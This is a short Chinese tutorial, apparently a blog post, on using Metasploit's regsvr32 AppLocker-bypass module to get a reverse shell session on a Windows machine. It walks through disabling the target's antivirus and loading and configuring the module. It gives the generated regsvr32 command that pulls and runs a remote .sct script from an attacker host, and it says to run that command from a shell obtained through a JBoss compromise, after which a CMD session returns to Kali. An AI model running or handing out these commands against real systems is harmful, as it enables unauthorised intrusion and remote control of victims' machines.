Metasploit对Rundll32的

参考利用文章链接:http://www.freebuf.com/articles/terminal/135391.html

    http://www.4hou.com/technology/5737.html

Rundll32的利用是通过对注册动手脚,建立一个会话链接W7以上都存在,但是现在杀毒软件都监控,实验的时候关闭目标机的

杀毒软件(如:360)

通过虚拟机打物理机,下图可以看见同一网段而且是互相可以通讯的

启动Metasploit


加载漏洞利用模块:use exploit/windows/misc/regsvr32_applocker_bypass_server 



查看需要哪些参数:show options 


配置参数运行


得到一个 regsvr32 /s /n /u /i:http://192.168.117.155:8080/S2hYxUgEgmEK9.sct scrobj.dll


结合jeboss抓的服务器如果是Windows的,在获得的shell 的CMD命令下执行


在回到kail 发现反弹了一个session ,执行session就开启了一个CMD



结合一些windows的命令执行参考链接: http://www.sohu.com/a/199732200_99907709 





發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章